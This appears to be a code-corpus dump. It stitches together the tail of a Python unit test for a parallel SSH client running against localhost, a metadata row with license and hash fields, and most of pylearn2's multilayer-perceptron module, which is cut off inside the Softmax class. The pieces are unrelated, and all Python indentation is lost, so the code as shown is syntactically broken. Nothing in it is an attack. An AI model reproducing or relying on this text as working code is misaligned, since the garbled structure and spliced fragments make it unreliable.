def test_run_command_json_output_transformed_to_object(self):
hosts = ['127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
results = client.run('stuff', timeout=60)
self.assertTrue('127.0.0.1' in results)
self.assertDictEqual(results['127.0.0.1']['stdout'], {'foo': 'bar'})
| apache-2.0 | -4,133,305,447,443,318,000 | 43.569721 | 98 | 0.543309 | false |
CKehl/pylearn2 | pylearn2/models/mlp.py | 1 | 166462 | """
Multilayer Perceptron
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow", "David Warde-Farley"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import logging
import math
import operator
import sys
import warnings
import numpy as np
from theano.compat import six
from theano.compat.six.moves import reduce, xrange
from theano import config
from theano.gof.op import get_debug_values
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.sandbox.cuda.dnn import dnn_available, dnn_pool
from theano.tensor.signal.downsample import max_pool_2d
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.costs.mlp import Default
from pylearn2.expr.probabilistic_max_pooling import max_pool_channels
from pylearn2.linear import conv2d
from pylearn2.linear.matrixmul import MatrixMul
from pylearn2.model_extensions.norm_constraint import MaxL2FilterNorm
from pylearn2.models.model import Model
from pylearn2.monitor import get_monitor_doc
from pylearn2.expr.nnet import arg_of_softmax
from pylearn2.expr.nnet import pseudoinverse_softmax_numpy
from pylearn2.space import CompositeSpace
from pylearn2.space import Conv2DSpace
from pylearn2.space import Space
from pylearn2.space import VectorSpace, IndexSpace
from pylearn2.utils import function
from pylearn2.utils import is_iterable
from pylearn2.utils import py_float_types
from pylearn2.utils import py_integer_types
from pylearn2.utils import safe_union
from pylearn2.utils import safe_zip
from pylearn2.utils import safe_izip
from pylearn2.utils import sharedX
from pylearn2.utils import wraps
from pylearn2.utils import contains_inf
from pylearn2.utils import isfinite
from pylearn2.utils.data_specs import DataSpecsMapping
from pylearn2.expr.nnet import (elemwise_kl, kl, compute_precision,
compute_recall, compute_f1)
# Only to be used by the deprecation warning wrapper functions
from pylearn2.costs.mlp import L1WeightDecay as _L1WD
from pylearn2.costs.mlp import WeightDecay as _WD
from pylearn2.sandbox.rnn.models.mlp_hook import RNNWrapper
logger = logging.getLogger(__name__)
logger.debug("MLP changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when doing max pooling via subtensors don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at LISA labo) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
if six.PY3:
LayerBase = six.with_metaclass(RNNWrapper, Model)
else:
LayerBase = Model
class Layer(LayerBase):
"""
Abstract class. A Layer of an MLP.
May only belong to one MLP.
Parameters
----------
kwargs : dict
Passed on to the superclass.
Notes
-----
This is not currently a Block because as far as I know the Block interface
assumes every input is a single matrix. It doesn't support using Spaces to
work with composite inputs, stacked multichannel image inputs, etc. If the
Block interface were upgraded to be that flexible, then we could make this
a block.
"""
# This enables RNN compatibility
__metaclass__ = RNNWrapper
# When applying dropout to a layer's input, use this for masked values.
# Usually this will be 0, but certain kinds of layers may want to override
# this behaviour.
dropout_input_mask_value = 0.
def get_mlp(self):
"""
Returns the MLP that this layer belongs to.
Returns
-------
mlp : MLP
The MLP that this layer belongs to, or None if it has not been
assigned to an MLP yet.
"""
if hasattr(self, 'mlp'):
return self.mlp
return None
def set_mlp(self, mlp):
"""
Assigns this layer to an MLP. This layer will then use the MLP's
random number generator, batch size, etc. This layer's name must
be unique within the MLP.
Parameters
----------
mlp : MLP
"""
assert self.get_mlp() is None
self.mlp = mlp
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
"""
Returns monitoring channels.
Parameters
----------
state_below : member of self.input_space
A minibatch of states that this Layer took as input.
Most of the time providing state_blow is unnecessary when
state is given.
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
targets : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
Returns
-------
channels : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
return OrderedDict()
def fprop(self, state_below):
"""
Does the forward prop transformation for this layer.
Parameters
----------
state_below : member of self.input_space
A minibatch of states of the layer below.
Returns
-------
state : member of self.output_space
A minibatch of states of this layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement fprop.")
def cost(self, Y, Y_hat):
"""
The cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : theano.gof.Variable
The targets
Y_hat : theano.gof.Variable
The predictions.
Assumed to be the output of the layer's `fprop` method.
The implmentation is permitted to do things like look at the
ancestors of `Y_hat` in the theano graph. This is useful for
e.g. computing numerically stable *log* probabilities when
`Y_hat` is the *probability*.
Returns
-------
cost : theano.gof.Variable
A Theano scalar describing the cost.
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost.")
def cost_from_cost_matrix(self, cost_matrix):
"""
The cost final scalar cost computed from the cost matrix
Parameters
----------
cost_matrix : WRITEME
Examples
--------
>>> # C = model.cost_matrix(Y, Y_hat)
>>> # Do something with C like setting some values to 0
>>> # cost = model.cost_from_cost_matrix(C)
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"mlp.Layer.cost_from_cost_matrix.")
def cost_matrix(self, Y, Y_hat):
"""
The element wise cost of outputting Y_hat when the true output is Y.
Parameters
----------
Y : WRITEME
Y_hat : WRITEME
Returns
-------
WRITEME
"""
raise NotImplementedError(
str(type(self)) + " does not implement mlp.Layer.cost_matrix")
def set_weights(self, weights):
"""
Sets the weights of the layer.
Parameters
----------
weights : ndarray
A numpy ndarray containing the desired weights of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_weights.")
def get_biases(self):
"""
Returns the value of the biases of the layer.
Returns
-------
biases : ndarray
A numpy ndarray containing the biases of the layer. This docstring
is provided by the Layer base class. Layer subclasses should add
their own docstring explaining the subclass-specific format of the
ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"get_biases (perhaps because the class has no biases).")
def set_biases(self, biases):
"""
Sets the biases of the layer.
Parameters
----------
biases : ndarray
A numpy ndarray containing the desired biases of the layer. This
docstring is provided by the Layer base class. Layer subclasses
should add their own docstring explaining the subclass-specific
format of the ndarray.
"""
raise NotImplementedError(
str(type(self)) + " does not implement "
"set_biases (perhaps because the class has no biases).")
def get_weights_format(self):
"""
Returns a description of how to interpret the weights of the layer.
Returns
-------
format: tuple
Either ('v', 'h') or ('h', 'v').
('v', 'h') means a weight matrix of shape
(num visible units, num hidden units),
while ('h', 'v') means the transpose of it.
"""
raise NotImplementedError
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_weight_decay.")
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for an L1 penalty on the weights.
Parameters
----------
coeff : float or tuple
The coefficient on the L1 weight decay penalty for this layer.
This docstring is provided by the Layer base class. Individual
Layer subclasses should add their own docstring explaining the
format of `coeff` for that particular layer. For most ordinary
layers, `coeff` is a single float to multiply by the weight
decay term. Layers containing many pieces may take a tuple or
nested tuple of floats, and should explain the semantics of
the different elements of the tuple.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
raise NotImplementedError(
str(type(self)) + " does not implement get_l1_weight_decay.")
def set_input_space(self, space):
"""
Tells the layer to prepare for input formatted according to the
given space.
Parameters
----------
space : Space
The Space the input to this layer will lie in.
Notes
-----
This usually resets parameters.
"""
raise NotImplementedError(
str(type(self)) + " does not implement set_input_space.")
class MLP(Layer):
"""
A multilayer perceptron.
Note that it's possible for an entire MLP to be a single layer of a larger
MLP.
Parameters
----------
layers : list
A list of Layer objects. The final layer specifies the output space
of this MLP.
batch_size : int, optional
If not specified then must be a positive integer. Mostly useful if
one of your layers involves a Theano op like convolution that
requires a hard-coded batch size.
nvis : int, optional
Number of "visible units" (input units). Equivalent to specifying
`input_space=VectorSpace(dim=nvis)`. Note that certain methods require
a different type of input space (e.g. a Conv2Dspace in the case of
convnets). Use the input_space parameter in such cases. Should be
None if the MLP is part of another MLP.
input_space : Space object, optional
A Space specifying the kind of input the MLP accepts. If None,
input space is specified by nvis. Should be None if the MLP is
part of another MLP.
input_source : string or (nested) tuple of strings, optional
A (nested) tuple of strings specifiying the input sources this
MLP accepts. The structure should match that of input_space. The
default is 'features'. Note that this argument is ignored when
the MLP is nested.
target_source : string or (nested) tuple of strings, optional
A (nested) tuple of strings specifiying the target sources this
MLP accepts. The structure should match that of target_space. The
default is 'targets'. Note that this argument is ignored when
the MLP is nested.
layer_name : name of the MLP layer. Should be None if the MLP is
not part of another MLP.
seed : WRITEME
monitor_targets : bool, optional
Default: True
If true, includes monitoring channels that are functions of the
targets. This can be disabled to allow monitoring on monitoring
datasets that do not include targets.
kwargs : dict
Passed on to the superclass.
"""
def __init__(self, layers, batch_size=None, input_space=None,
input_source='features', target_source='targets',
nvis=None, seed=None, layer_name=None, monitor_targets=True,
**kwargs):
super(MLP, self).__init__(**kwargs)
self.seed = seed
assert isinstance(layers, list)
assert all(isinstance(layer, Layer) for layer in layers)
assert len(layers) >= 1
self.layer_name = layer_name
self.layer_names = set()
for layer in layers:
assert layer.get_mlp() is None
if layer.layer_name in self.layer_names:
raise ValueError("MLP.__init__ given two or more layers "
"with same name: " + layer.layer_name)
layer.set_mlp(self)
self.layer_names.add(layer.layer_name)
self.layers = layers
self.batch_size = batch_size
self.force_batch_size = batch_size
self._input_source = input_source
self._target_source = target_source
self.monitor_targets = monitor_targets
if input_space is not None or nvis is not None:
self._nested = False
self.setup_rng()
# check if the layer_name is None (the MLP is the outer MLP)
assert layer_name is None
if nvis is not None:
input_space = VectorSpace(nvis)
# Check whether the input_space and input_source structures match
try:
DataSpecsMapping((input_space, input_source))
except ValueError:
raise ValueError("The structures of `input_space`, %s, and "
"`input_source`, %s do not match. If you "
"specified a CompositeSpace as an input, "
"be sure to specify the data sources as well."
% (input_space, input_source))
self.input_space = input_space
self._update_layer_input_spaces()
else:
self._nested = True
self.freeze_set = set([])
@property
def input_source(self):
assert not self._nested, "A nested MLP does not have an input source"
return self._input_source
@property
def target_source(self):
assert not self._nested, "A nested MLP does not have a target source"
return self._target_source
def setup_rng(self):
"""
.. todo::
WRITEME
"""
assert not self._nested, "Nested MLPs should use their parent's RNG"
if self.seed is None:
self.seed = [2013, 1, 4]
self.rng = np.random.RandomState(self.seed)
@wraps(Layer.get_default_cost)
def get_default_cost(self):
return Default()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layers[-1].get_output_space()
@wraps(Layer.get_target_space)
def get_target_space(self):
return self.layers[-1].get_target_space()
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if hasattr(self, "mlp"):
#assert self._nested
self.input_space = self.mlp.input_space
self.rng = self.mlp.rng
self.batch_size = self.mlp.batch_size
else:
self.input_space = space
self._update_layer_input_spaces()
def _update_layer_input_spaces(self):
"""
Tells each layer what its input space should be.
Notes
-----
This usually resets the layer's parameters!
"""
layers = self.layers
try:
layers[0].set_input_space(self.get_input_space())
except BadInputSpaceError as e:
raise TypeError("Layer 0 (" + str(layers[0]) + " of type " +
str(type(layers[0])) +
") does not support the MLP's "
+ "specified input space (" +
str(self.get_input_space()) +
" of type " + str(type(self.get_input_space())) +
"). Original exception: " + str(e))
for i in xrange(1, len(layers)):
layers[i].set_input_space(layers[i - 1].get_output_space())
def add_layers(self, layers):
"""
Add new layers on top of the existing hidden layers
Parameters
----------
layers : WRITEME
"""
existing_layers = self.layers
assert len(existing_layers) > 0
for layer in layers:
assert layer.get_mlp() is None
layer.set_mlp(self)
# In the case of nested MLPs, input/output spaces may have not yet
# been initialized
if not self._nested or hasattr(self, 'input_space'):
layer.set_input_space(existing_layers[-1].get_output_space())
existing_layers.append(layer)
assert layer.layer_name not in self.layer_names
self.layer_names.add(layer.layer_name)
def freeze(self, parameter_set):
"""
Freezes some of the parameters (new theano functions that implement
learning will not use them; existing theano functions will continue
to modify them).
Parameters
----------
parameter_set : set
Set of parameters to freeze.
"""
self.freeze_set = self.freeze_set.union(parameter_set)
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
# if the MLP is the outer MLP \
# (ie MLP is not contained in another structure)
if self.monitor_targets:
X, Y = data
else:
X = data
Y = None
state = X
rval = self.get_layer_monitoring_channels(state_below=X,
targets=Y)
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
state = state_below
for layer in self.layers:
# We don't go through all the inner layers recursively
state_below = state
state = layer.fprop(state)
args = [state_below, state]
if layer is self.layers[-1] and targets is not None:
args.append(targets)
ch = layer.get_layer_monitoring_channels(*args)
if not isinstance(ch, OrderedDict):
raise TypeError(str((type(ch), layer.layer_name)))
for key in ch:
value = ch[key]
doc = get_monitor_doc(value)
if doc is None:
doc = str(type(layer)) + \
".get_monitoring_channels_from_state did" + \
" not provide any further documentation for" + \
" this channel."
if layer.layer_name is not None:
doc = 'This channel came from a layer called "' + \
layer.layer_name + '" of an MLP.\n' + doc
else:
doc = 'This channel came from a pickled layer' + \
' of an MLP.\n' + doc
layer.layer_name = "pickled_pretrained"
value.__doc__ = doc
rval[layer.layer_name + '_' + key] = value
return rval
def get_monitoring_data_specs(self):
"""
Returns data specs requiring both inputs and targets.
Returns
-------
data_specs: TODO
The data specifications for both inputs and targets.
"""
if not self.monitor_targets:
return (self.get_input_space(), self.get_input_source())
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
@wraps(Layer.get_params)
def get_params(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = []
for layer in self.layers:
for param in layer.get_params():
if param.name is None:
logger.info(type(layer))
layer_params = layer.get_params()
assert not isinstance(layer_params, set)
for param in layer_params:
if param not in rval:
rval.append(param)
rval = [elem for elem in rval if elem not in self.freeze_set]
assert all([elem.name is not None for elem in rval])
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
# check the case where coeffs is a scalar
if not hasattr(coeffs, '__iter__'):
coeffs = [coeffs] * len(self.layers)
layer_costs = []
for layer, coeff in safe_izip(self.layers, coeffs):
if coeff != 0.:
layer_costs += [layer.get_l1_weight_decay(coeff)]
if len(layer_costs) == 0:
return T.constant(0, dtype=config.floatX)
total_cost = reduce(operator.add, layer_costs)
return total_cost
@wraps(Model.set_batch_size)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
self.force_batch_size = batch_size
for layer in self.layers:
layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
@wraps(Layer.get_weights)
def get_weights(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights()
@wraps(Layer.get_weights_view_shape)
def get_weights_view_shape(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_view_shape()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_format()
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
return self.layers[0].get_weights_topo()
def dropout_fprop(self, state_below, default_input_include_prob=0.5,
input_include_probs=None, default_input_scale=2.,
input_scales=None, per_example=True):
"""
Returns the output of the MLP, when applying dropout to the input and
intermediate layers.
Parameters
----------
state_below : WRITEME
The input to the MLP
default_input_include_prob : WRITEME
input_include_probs : WRITEME
default_input_scale : WRITEME
input_scales : WRITEME
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
Notes
-----
Each input to each layer is randomly included or
excluded for each example. The probability of inclusion is independent
for each input and each example. Each layer uses
`default_input_include_prob` unless that layer's name appears as a key
in input_include_probs, in which case the input inclusion probability
is given by the corresponding value.
Each feature is also multiplied by a scale factor. The scale factor for
each layer's input scale is determined by the same scheme as the input
probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
self._validate_layer_names(list(input_include_probs.keys()))
self._validate_layer_names(list(input_scales.keys()))
theano_rng = MRG_RandomStreams(max(self.rng.randint(2 ** 15), 1))
for layer in self.layers:
layer_name = layer.layer_name
if layer_name in input_include_probs:
include_prob = input_include_probs[layer_name]
else:
include_prob = default_input_include_prob
if layer_name in input_scales:
scale = input_scales[layer_name]
else:
scale = default_input_scale
state_below = self.apply_dropout(
state=state_below,
include_prob=include_prob,
theano_rng=theano_rng,
scale=scale,
mask_value=layer.dropout_input_mask_value,
input_space=layer.get_input_space(),
per_example=per_example
)
state_below = layer.fprop(state_below)
return state_below
def masked_fprop(self, state_below, mask, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Forward propagate through the network with a dropout mask
determined by an integer (the binary representation of
which is used to generate the mask).
Parameters
----------
state_below : tensor_like
The (symbolic) output state of the layer below.
mask : int
An integer indexing possible binary masks. It should be
< 2 ** get_total_input_dimension(masked_input_layers)
and greater than or equal to 0.
masked_input_layers : list, optional
A list of layer names to mask. If `None`, the input to all layers
(including the first hidden layer) is masked.
default_input_scale : float, optional
The amount to scale inputs in masked layers that do not appear in
`input_scales`. Defaults to 2.
input_scales : dict, optional
A dictionary mapping layer names to floating point numbers
indicating how much to scale input to a given layer.
Returns
-------
masked_output : tensor_like
The output of the forward propagation of the masked network.
"""
if input_scales is not None:
self._validate_layer_names(input_scales)
else:
input_scales = {}
if any(n not in masked_input_layers for n in input_scales):
layers = [n for n in input_scales if n not in masked_input_layers]
raise ValueError("input scales provided for layer not masked: " %
", ".join(layers))
if masked_input_layers is not None:
self._validate_layer_names(masked_input_layers)
else:
masked_input_layers = self.layer_names
num_inputs = self.get_total_input_dimension(masked_input_layers)
assert mask >= 0, "Mask must be a non-negative integer."
if mask > 0 and math.log(mask, 2) > num_inputs:
raise ValueError("mask value of %d too large; only %d "
"inputs to layers (%s)" %
(mask, num_inputs,
", ".join(masked_input_layers)))
def binary_string(x, length, dtype):
"""
Create the binary representation of an integer `x`, padded to
`length`, with dtype `dtype`.
Parameters
----------
length : WRITEME
dtype : WRITEME
Returns
-------
WRITEME
"""
s = np.empty(length, dtype=dtype)
for i in range(length - 1, -1, -1):
if x // (2 ** i) == 1:
s[i] = 1
else:
s[i] = 0
x = x % (2 ** i)
return s
remaining_mask = mask
for layer in self.layers:
if layer.layer_name in masked_input_layers:
scale = input_scales.get(layer.layer_name,
default_input_scale)
n_inputs = layer.get_input_space().get_total_dimension()
layer_dropout_mask = remaining_mask & (2 ** n_inputs - 1)
remaining_mask >>= n_inputs
mask = binary_string(layer_dropout_mask, n_inputs,
'uint8')
shape = layer.get_input_space().get_origin_batch(1).shape
s_mask = T.as_tensor_variable(mask).reshape(shape)
if layer.dropout_input_mask_value == 0:
state_below = state_below * s_mask * scale
else:
state_below = T.switch(s_mask, state_below * scale,
layer.dropout_input_mask_value)
state_below = layer.fprop(state_below)
return state_below
def _validate_layer_names(self, layers):
"""
.. todo::
WRITEME
"""
if any(layer not in self.layer_names for layer in layers):
unknown_names = [layer for layer in layers
if layer not in self.layer_names]
raise ValueError("MLP has no layer(s) named %s" %
", ".join(unknown_names))
def get_total_input_dimension(self, layers):
"""
Get the total number of inputs to the layers whose
names are listed in `layers`. Used for computing the
total number of dropout masks.
Parameters
----------
layers : WRITEME
Returns
-------
WRITEME
"""
self._validate_layer_names(layers)
total = 0
for layer in self.layers:
if layer.layer_name in layers:
total += layer.get_input_space().get_total_dimension()
return total
@wraps(Layer.fprop)
def fprop(self, state_below, return_all=False):
if not hasattr(self, "input_space"):
raise AttributeError("Input space has not been provided.")
rval = self.layers[0].fprop(state_below)
rlist = [rval]
for layer in self.layers[1:]:
rval = layer.fprop(rval)
rlist.append(rval)
if return_all:
return rlist
return rval
def apply_dropout(self, state, include_prob, scale, theano_rng,
input_space, mask_value=0, per_example=True):
"""
.. todo::
WRITEME
Parameters
----------
state: WRITEME
include_prob : WRITEME
scale : WRITEME
theano_rng : WRITEME
input_space : WRITEME
mask_value : WRITEME
per_example : bool, optional
Sample a different mask value for every example in a batch.
Defaults to `True`. If `False`, sample one mask per mini-batch.
"""
if include_prob in [None, 1.0, 1]:
return state
assert scale is not None
if isinstance(state, tuple):
return tuple(self.apply_dropout(substate, include_prob,
scale, theano_rng, mask_value)
for substate in state)
# TODO: all of this assumes that if it's not a tuple, it's
# a dense tensor. It hasn't been tested with sparse types.
# A method to format the mask (or any other values) as
# the given symbolic type should be added to the Spaces
# interface.
if per_example:
mask = theano_rng.binomial(p=include_prob, size=state.shape,
dtype=state.dtype)
else:
batch = input_space.get_origin_batch(1)
mask = theano_rng.binomial(p=include_prob, size=batch.shape,
dtype=state.dtype)
rebroadcast = T.Rebroadcast(*zip(xrange(batch.ndim),
[s == 1 for s in batch.shape]))
mask = rebroadcast(mask)
if mask_value == 0:
rval = state * mask * scale
else:
rval = T.switch(mask, state * scale, mask_value)
return T.cast(rval, state.dtype)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.layers[-1].cost(Y, Y_hat)
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
return self.layers[-1].cost_matrix(Y, Y_hat)
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return self.layers[-1].cost_from_cost_matrix(cost_matrix)
def cost_from_X(self, data):
"""
Computes self.cost, but takes data=(X, Y) rather than Y_hat as an
argument.
This is just a wrapper around self.cost that computes Y_hat by
calling Y_hat = self.fprop(X)
Parameters
----------
data : WRITEME
"""
self.cost_from_X_data_specs()[0].validate(data)
X, Y = data
Y_hat = self.fprop(X)
return self.cost(Y, Y_hat)
def cost_from_X_data_specs(self):
"""
Returns the data specs needed by cost_from_X.
This is useful if cost_from_X is used in a MethodCost.
"""
space = CompositeSpace((self.get_input_space(),
self.get_target_space()))
source = (self.get_input_source(), self.get_target_source())
return (space, source)
def __str__(self):
"""
Summarizes the MLP by printing the size and format of the input to all
layers. Feel free to add reasonably concise info as needed.
"""
rval = []
for layer in self.layers:
rval.append(layer.layer_name)
input_space = layer.get_input_space()
rval.append('\tInput space: ' + str(input_space))
rval.append('\tTotal input dimension: ' +
str(input_space.get_total_dimension()))
rval = '\n'.join(rval)
return rval
class Softmax(Layer):
"""
A layer that can apply an optional affine transformation
to vectorial inputs followed by a softmax nonlinearity.
Parameters
----------
n_classes : int
Number of classes for softmax targets.
layer_name : string
Name of Softmax layers.
irange : float
If specified, initialized each weight randomly in
U(-irange, irange).
istdev : float
If specified, initialize each weight randomly from
N(0,istdev).
sparse_init : int
If specified, initial sparse_init number of weights
for each unit from N(0,1).
W_lr_scale : float
Scale for weight learning rate.
b_lr_scale : float
Scale for bias learning rate.
max_row_norm : float
Maximum norm for a row of the weight matrix.
no_affine : boolean
If True, softmax nonlinearity is applied directly to
inputs.
max_col_norm : float
Maximum norm for a column of the weight matrix.
init_bias_target_marginals : dataset
Take the probability distribution of the targets into account to
intelligently initialize biases.
binary_target_dim : int, optional
If your targets are class labels (i.e. a binary vector) then set the
number of targets here so that an IndexSpace of the proper dimension
can be used as the target space. This allows the softmax to compute
the cost much more quickly than if it needs to convert the targets
into a VectorSpace. With binary_target_dim>1, you can use one layer
to simultaneously predict a bag of words (i.e. order is not important,
the same element can be included more than once).
non_redundant : bool
If True, learns only n_classes - 1 biases and weight vectors
"""
def __init__(self, n_classes, layer_name, irange=None,
istdev=None,
sparse_init=None, W_lr_scale=None,
b_lr_scale=None, max_row_norm=None,
no_affine=False,
max_col_norm=None, init_bias_target_marginals=None,
binary_target_dim=None, non_redundant=False):
super(Softmax, self).__init__()
if max_col_norm is not None:
self.extensions.append(MaxL2FilterNorm(max_col_norm))
if non_redundant:
if init_bias_target_marginals:
msg = ("init_bias_target_marginals currently only works "
"with the overcomplete parameterization.")
raise NotImplementedError(msg)
if isinstance(W_lr_scale, str):
W_lr_scale = float(W_lr_scale)
self.__dict__.update(locals())
del self.self
del self.init_bias_target_marginals
if not isinstance(n_classes, py_integer_types):
raise TypeError("n_classes is of type %s, but must be integer" %
type(n_classes))
if binary_target_dim is not None:
assert isinstance(binary_target_dim, py_integer_types)
self._has_binary_target = True
self._target_space = IndexSpace(dim=binary_target_dim,
max_labels=n_classes)
else:
self._has_binary_target = False
self.output_space = VectorSpace(n_classes)
if not no_affine:
self.b = sharedX(np.zeros((n_classes - self.non_redundant,)),
name='softmax_b')
if init_bias_target_marginals:
y = init_bias_target_marginals.y
if init_bias_target_marginals.y_labels is None:
marginals = y.mean(axis=0)
else:
# compute class frequencies
if np.max(y.shape) != np.prod(y.shape):
raise AssertionError("Use of "
"`init_bias_target_marginals` "
"requires that each example has "
"a single label.")
marginals = np.bincount(y.flat) / float(y.shape[0])
assert marginals.ndim == 1
b = pseudoinverse_softmax_numpy(marginals).astype(self.b.dtype)
assert b.ndim == 1
assert b.dtype == self.b.dtype
self.b.set_value(b)
else:
assert init_bias_target_marginals is None
def __setstate__(self, state):
super(Softmax, self).__setstate__(state)
# Patch old pickle files
if not hasattr(self, 'non_redundant'):
self.non_redundant = False
if not hasattr(self, 'mask_weights'):
self.mask_weights = None
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = OrderedDict()
if self.W_lr_scale is not None:
assert isinstance(self.W_lr_scale, float)
rval[self.W] = self.W_lr_scale
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
if self.b_lr_scale is not None:
assert isinstance(self.b_lr_scale, float)
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
if not self.no_affine:
W = self.W
assert W.ndim == 2
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=1))
col_norms = T.sqrt(sq_W.sum(axis=0))
rval.update(OrderedDict([('row_norms_min', row_norms.min()),
('row_norms_mean', row_norms.mean()),
('row_norms_max', row_norms.max()),
('col_norms_min', col_norms.min()),
('col_norms_mean', col_norms.mean()),
('col_norms_max', col_norms.max()), ]))
if (state_below is not None) or (state is not None):
if state is None:
state = self.fprop(state_below)
mx = state.max(axis=1)
rval.update(OrderedDict([('mean_max_class', mx.mean()),
('max_max_class', mx.max()),
('min_max_class', mx.min())]))
if (targets is not None):
if ((not self._has_binary_target) or
self.binary_target_dim == 1):
# if binary_target_dim>1, the misclass rate is ill-defined
y_hat = T.argmax(state, axis=1)
y = (targets.reshape(y_hat.shape)
if self._has_binary_target
else T.argmax(targets, axis=1))
misclass = T.neq(y, y_hat).mean()
misclass = T.cast(misclass, config.floatX)
rval['misclass'] = misclass
rval['nll'] = self.cost(Y_hat=state, Y=targets)
return rval
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Space):
raise TypeError("Expected Space, got " +
str(space) + " of type " + str(type(space)))
self.input_dim = space.get_total_dimension()
self.needs_reformat = not isinstance(space, VectorSpace)
if self.no_affine:
desired_dim = self.n_classes - self.non_redundant
assert self.input_dim == desired_dim
else:
desired_dim = self.input_dim
self.desired_space = VectorSpace(desired_dim)
if not self.needs_reformat:
assert self.desired_space == self.input_space
rng = self.mlp.rng
if self.no_affine:
self._params = []
else:
num_cols = self.n_classes - self.non_redundant
if self.irange is not None:
assert self.istdev is None
assert self.sparse_init is None
W = rng.uniform(-self.irange,
self.irange,
(self.input_dim, num_cols))
elif self.istdev is not None:
assert self.sparse_init is None
W = rng.randn(self.input_dim, num_cols) * self.istdev
else:
assert self.sparse_init is not None
W = np.zeros((self.input_dim, num_cols))
for i in xrange(num_cols):
for j in xrange(self.sparse_init):
idx = rng.randint(0, self.input_dim)
while W[idx, i] != 0.:
idx = rng.randint(0, self.input_dim)
W[idx, i] = rng.randn()
self.W = sharedX(W, 'softmax_W')
self._params = [self.b, self.W]
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
if not isinstance(self.input_space, Conv2DSpace):
